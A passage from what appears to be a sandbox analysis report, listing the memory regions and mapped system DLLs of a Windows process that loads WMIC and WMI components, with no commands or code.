end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2439
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 2440
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 2441
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 2442
start_va = 0x50000
end_va = 0xb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2443
start_va = 0x7feff870000
end_va = 0x7feff94afff
monitored = 0
entry_point = 0x7feff890760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 2444
start_va = 0x7feff7d0000
end_va = 0x7feff86efff
monitored = 0
entry_point = 0x7feff7d25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2445
start_va = 0x7fefdef0000
end_va = 0x7fefdf0efff
monitored = 0
entry_point = 0x7fefdef60e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 2446
start_va = 0x7feffa60000
end_va = 0x7feffb8cfff
monitored = 0
entry_point = 0x7feffaaed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 2447
start_va = 0x7fefdf10000
end_va = 0x7fefe112fff
monitored = 0
entry_point = 0x7fefdf33330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 2448
start_va = 0x7feff980000
end_va = 0x7feff9e6fff
monitored = 0
entry_point = 0x7feff98b03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2449
start_va = 0x77780000
end_va = 0x77879fff
monitored = 0
entry_point = 0x7779a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2450
start_va = 0x7fefef80000
end_va = 0x7fefef8dfff
monitored = 0
entry_point = 0x7fefef81080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 2451
start_va = 0x7fefe120000
end_va = 0x7fefe1e8fff
monitored = 0
entry_point = 0x7fefe19a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 2452
start_va = 0x7feff550000
end_va = 0x7feff626fff
monitored = 0
entry_point = 0x7feff553274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 2453
start_va = 0x7fef4dd0000
end_va = 0x7fef4e12fff
monitored = 0
entry_point = 0x7fef4df1b50
region_type = mapped_file
name = "framedynos.dll"
filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll")
Region:
id = 2454
start_va = 0x7fefd690000
end_va = 0x7fefd6b4fff
monitored = 0
entry_point = 0x7fefd699658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 2455
start_va = 0x7feff630000
end_va = 0x7feff6a0fff
monitored = 0
entry_point = 0x7feff641e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 2456
start_va = 0x7feffa10000
end_va = 0x7feffa5cfff
monitored = 0
entry_point = 0x7feffa11070
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 2457
start_va = 0x7feff540000
end_va = 0x7feff547fff
monitored = 0
entry_point = 0x7feff541504
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 2458
start_va = 0x7fefd660000
end_va = 0x7fefd66afff
monitored = 0
entry_point = 0x7fefd661030
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")
Region:
id = 2459
start_va = 0x7fefb2c0000
end_va = 0x7fefb2e6fff
monitored = 0
entry_point = 0x7fefb2c98bc
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 2460
start_va = 0x7fefb2b0000
end_va = 0x7fefb2bafff
monitored = 0
entry_point = 0x7fefb2b1198
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 2461
start_va = 0x170000
end_va = 0x20ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000170000"
filename = ""
Region:
id = 2462
start_va = 0x240000
end_va = 0x33ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000240000"
filename = ""
Region:
id = 2463
start_va = 0x340000
end_va = 0x43ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000340000"
filename = ""
Region:
id = 2496
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2497
start_va = 0x440000
end_va = 0x5c7fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000440000"
filename = ""
Region:
id = 2498
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2499
start_va = 0x7feff950000
end_va = 0x7feff97dfff
monitored = 0
entry_point = 0x7feff951010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2500
start_va = 0x7feff3d0000
end_va = 0x7feff4d8fff
monitored = 0
entry_point = 0x7feff3d1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 2501
start_va = 0x5d0000
end_va = 0x750fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005d0000"
filename = ""
Region:
id = 2502
start_va = 0x760000
end_va = 0x1b5ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000760000"
filename = ""
Region:
id = 2503
start_va = 0xc0000
end_va = 0xcffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "wmic.exe.mui"
filename = "\\Windows\\System32\\wbem\\en-US\\WMIC.exe.mui" (normalized: "c:\\windows\\system32\\wbem\\en-us\\wmic.exe.mui")
Region:
id = 2514
start_va = 0xd0000
end_va = 0xd0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 2515
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 2516
start_va = 0x170000
end_va = 0x1ecfff
monitored = 0
entry_point = 0x17cec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 2517
start_va = 0x200000
end_va = 0x20ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 2518
start_va = 0x170000
end_va = 0x1ecfff
monitored = 0
entry_point = 0x17cec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 2519
start_va = 0x7fefd6c0000
end_va = 0x7fefd6cefff
monitored = 0
entry_point = 0x7fefd6c1010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 2521
start_va = 0x1c20000
end_va = 0x1c9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001c20000"
filename = ""
Region:
id = 2522
start_va = 0x7fffffdb000
end_va = 0x7fffffdcfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdb000"
filename = ""
Region:
id = 2523
start_va = 0x170000
end_va = 0x170fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000170000"
filename = ""
Region:
id = 2524
start_va = 0x7fefde50000
end_va = 0x7fefdee8fff
monitored = 0
entry_point = 0x7fefde51c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 2525
start_va = 0x180000
end_va = 0x180fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000180000"
filename = ""
Region:
id = 2526
start_va = 0x7fef9bd0000
end_va = 0x7fef9bddfff
monitored = 0
entry_point = 0x7fef9bd5500
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 2527
start_va = 0x7fef9e70000
end_va = 0x7fef9ee6fff
monitored = 0
entry_point = 0x7fef9eae7f0
region_type = mapped_file
name = "wbemcomn2.dll"
filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll")
Region:
id = 2528
start_va = 0x7fefd230000
end_va = 0x7fefd251fff
monitored = 0
entry_point = 0x7fefd235d30
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 2529
start_va = 0x1ca0000
end_va = 0x1f6efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 2530
start_va = 0x7fef4380000
end_va = 0x7fef4553fff
monitored = 0
entry_point = 0x7fef43b6b00
region_type = mapped_file
name = "msxml3.dll"
filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll")
Region:
id = 2531
start_va = 0x1f70000
end_va = 0x21affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f70000"
filename = ""
Region:
id = 2532
start_va = 0x1f70000
end_va = 0x20dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f70000"
filename = ""
Region:
id = 2533
start_va = 0x2130000
end_va = 0x21affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002130000"
filename = ""
Region:
id = 2534
start_va = 0x21b0000
end_va = 0x235ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000021b0000"
filename = ""
Region:
id = 2535
start_va = 0x1f70000
end_va = 0x205ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f70000"
filename = ""
Region:
id = 2536
start_va = 0x2060000
end_va = 0x20dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002060000"
filename = ""
Region:
id = 2537
start_va = 0x2360000
end_va = 0x257ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002360000"
filename = ""
Region:
id = 2538
start_va = 0x21b0000
end_va = 0x22affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000021b0000"
filename = ""
Region:
id = 2539
start_va = 0x22e0000
end_va = 0x235ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000022e0000"
filename = ""
Region:
id = 2540
start_va = 0x2360000
end_va = 0x247ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002360000"
filename = ""
Region:
id = 2541
start_va = 0x2500000
end_va = 0x257ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002500000"
filename = ""
Region:
id = 2542
start_va = 0x1b60000
end_va = 0x1c1ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 2543
start_va = 0x2580000
end_va = 0x297ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002580000"
filename = ""
Region:
id = 2544
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msxml3r.dll"
filename = "\\Windows\\System32\\msxml3r.dll" (normalized: "c:\\windows\\system32\\msxml3r.dll")
Region:
id = 2545
start_va = 0x1a0000
end_va = 0x1bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001a0000"
filename = ""
Region:
id = 2546
start_va = 0x7fefdba0000
end_va = 0x7fefdd17fff
monitored = 0
entry_point = 0x7fefdba10e0
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 2547
start_va = 0x7fefdd20000
end_va = 0x7fefde49fff
monitored = 0
entry_point = 0x7fefdd210d4
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 2548
start_va = 0x7feff170000
end_va = 0x7feff3c8fff
monitored = 0
entry_point = 0x7feff171340
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 2549
start_va = 0x7fefda30000
end_va = 0x7fefdb9cfff
monitored = 0
entry_point = 0x7fefda310b4
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 2550
start_va = 0x7fefd870000
end_va = 0x7fefd87efff
monitored = 0
entry_point = 0x7fefd871020
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 2551
start_va = 0x1c0000
end_va = 0x1c1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001c0000"
filename = ""
Region:
id = 2552
start_va = 0x7fefc300000
end_va = 0x7fefc4f3fff
monitored = 0
entry_point = 0x7fefc48c924
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll")
Region:
id = 2553
start_va = 0x1d0000
end_va = 0x1d0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 2554
start_va = 0x1e0000
end_va = 0x1e1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001e0000"
filename = ""
Region:
id = 2555
start_va = 0x7fefe1f0000
end_va = 0x7fefef77fff
monitored = 0
entry_point = 0x7fefe26cebc
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 2556
start_va = 0x1d0000
end_va = 0x1d0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001d0000"
filename = ""
Region:
id = 2557
start_va = 0x7fefd7d0000
end_va = 0x7fefd7defff
monitored = 0
entry_point = 0x7fefd7d19b0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 2558
start_va = 0x1f0000
end_va = 0x1fffff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")
Region:
id = 2559
start_va = 0x210000
end_va = 0x217fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")
Region:
id = 2560
start_va = 0x220000
end_va = 0x22ffff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")
Region:
id = 2561
start_va = 0x7fefcee0000
end_va = 0x7fefcf3afff
monitored = 0
entry_point = 0x7fefcee6940
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 2562
start_va = 0x2980000
end_va = 0x2a3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002980000"
filename = ""
Region:
id = 2563
start_va = 0x7fefc120000
end_va = 0x7fefc175fff
monitored = 0
entry_point = 0x7fefc12bbc0
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 2564
start_va = 0x2a40000
end_va = 0x2b3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002a40000"
filename = ""
Region:
id = 2565
start_va = 0x2b40000
end_va = 0x2c1efff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002b40000"
filename = ""
Region:
id = 2566
start_va = 0x21b0000
end_va = 0x222ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000021b0000"
filename = ""
Region:
id = 2567
start_va = 0x2230000
end_va = 0x22affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002230000"
filename = ""
Region:
id = 2568
start_va = 0x7fefd0c0000
end_va = 0x7fefd0d7fff
monitored = 0
entry_point = 0x7fefd0c3b48
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 2569
start_va = 0x7fffffd9000
end_va = 0x7fffffdafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd9000"
filename = ""
Region:
id = 2570
start_va = 0x1f70000
end_va = 0x1fb4fff
monitored = 0
entry_point = 0x1f71064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 2571
start_va = 0x1fe0000
end_va = 0x205ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001fe0000"
filename = ""
Region:
id = 2572
start_va = 0x1f70000
end_va = 0x1fb4fff
monitored = 0
entry_point = 0x1f71064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 2573
start_va = 0x1f70000
end_va = 0x1fb4fff
monitored = 0
entry_point = 0x1f71064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 2574
start_va = 0x1f70000
end_va = 0x1fb4fff
monitored = 0
entry_point = 0x1f71064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 2575
start_va = 0x1f70000
end_va = 0x1fb4fff
monitored = 0
entry_point = 0x1f71064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 2576
start_va = 0x7fefcdc0000
end_va = 0x7fefce06fff
monitored = 0
entry_point = 0x7fefcdc1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 2577
start_va = 0x7fefd7b0000
end_va = 0x7fefd7c3fff
monitored = 0
entry_point = 0x7fefd7b10e0
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 2578
start_va = 0x2c30000
end_va = 0x2caffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002c30000"
filename = ""
Region:
id = 2579
start_va = 0x7fffffd7000
end_va = 0x7fffffd8fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd7000"
filename = ""
Region:
id = 2580
start_va = 0x2cc0000
end_va = 0x2d3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002cc0000"
filename = ""
Region:
id = 2581
start_va = 0x2e90000
end_va = 0x2f0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002e90000"
filename = ""
Region:
id = 2582
start_va = 0x7fffffd3000
end_va = 0x7fffffd4fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd3000"
filename = ""
Region:
id = 2583
start_va = 0x7fffffd5000
end_va = 0x7fffffd6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd5000"
filename = ""
Region:
id = 2584
start_va = 0x7fef7870000
end_va = 0x7fef7882fff
monitored = 0
entry_point = 0x7fef7877b68
region_type = mapped_file
name = "msoxmlmf.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSOXMLMF.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\msoxmlmf.dll")
Region:
id = 2585
start_va = 0x7fef8c20000
end_va = 0x7fef8c38fff
monitored = 0
entry_point = 0x7fef8c2ee50
region_type = mapped_file
name = "vcruntime140.dll"
filename = "\\Windows\\System32\\vcruntime140.dll" (normalized: "c:\\windows\\system32\\vcruntime140.dll")
Region:
id = 2586
start_va = 0x7fef8c10000
end_va = 0x7fef8c13fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-runtime-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-runtime-l1-1-0.dll")
Region:
id = 2587
start_va = 0x7fef8b10000
end_va = 0x7fef8c01fff
monitored = 0
entry_point = 0x7fef8b19060
region_type = mapped_file
name = "ucrtbase.dll"
filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll")
Region:
id = 2588
start_va = 0x7fef8b00000
end_va = 0x7fef8b02fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-timezone-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-timezone-l1-1-0.dll")
Region:
id = 2589
start_va = 0x7fef8af0000
end_va = 0x7fef8af2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-file-l2-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l2-1-0.dll")
Region:
id = 2590
start_va = 0x7fef8ae0000
end_va = 0x7fef8ae2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-localization-l1-2-0.dll"
filename = "\\Windows\\System32\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-localization-l1-2-0.dll")
Region:
id = 2591
start_va = 0x7fef9260000
end_va = 0x7fef9262fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-synch-l1-2-0.dll"
filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll")
Region:
id = 2592
start_va = 0x7fef8ad0000
end_va = 0x7fef8ad2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-processthreads-l1-1-1.dll"
filename = "\\Windows\\System32\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-processthreads-l1-1-1.dll")
Region:
id = 2593
start_va = 0x7fef8ac0000
end_va = 0x7fef8ac2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-file-l1-2-0.dll"
filename = "\\Windows\\System32\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l1-2-0.dll")
Region:
id = 2594
start_va = 0x7fef8ab0000
end_va = 0x7fef8ab2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-heap-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-heap-l1-1-0.dll")
Region:
id = 2595
start_va = 0x7fef8aa0000
end_va = 0x7fef8aa3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-string-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-string-l1-1-0.dll")
Region:
id = 2596
start_va = 0x7fef8a90000
end_va = 0x7fef8a93fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-stdio-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-stdio-l1-1-0.dll")
Region:
id = 2597
start_va = 0x7fef8a80000
end_va = 0x7fef8a83fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-convert-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-convert-l1-1-0.dll")
Region:
id = 2598
start_va = 0x230000
end_va = 0x230fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000230000"
filename = ""
Region:
id = 2599
start_va = 0x1f70000
end_va = 0x1f70fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f70000"
filename = ""
Region:
id = 2600
start_va = 0x7fef98f0000
end_va = 0x7fef9902fff
monitored = 0
entry_point = 0x7fef98f1d80
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 2601
start_va = 0x7fef9c10000
end_va = 0x7fef9ce2fff
monitored = 0
entry_point = 0x7fef9c88b00
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 2602
start_va = 0x7fef9be0000
end_va = 0x7fef9c06fff
monitored = 0
entry_point = 0x7fef9be11a0
region_type = mapped_file
name = "ntdsapi.dll"
filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")
Region:
id = 2604
start_va = 0x1f80000
end_va = 0x1fa3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001f80000"
filename = ""
Region:
id = 3122
start_va = 0x7fef7850000
end_va = 0x7fef7866fff
monitored = 0
entry_point = 0x7fef785eba0
region_type = mapped_file
name = "wmi2xml.dll"
filename = "\\Windows\\System32\\wbem\\xml\\wmi2xml.dll" (normalized: "c:\\windows\\system32\\wbem\\xml\\wmi2xml.dll")
Region:
id = 3123
start_va = 0x2d40000
end_va = 0x2e3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002d40000"
filename = ""
Region:
id = 3124
start_va = 0x7fef4ae0000
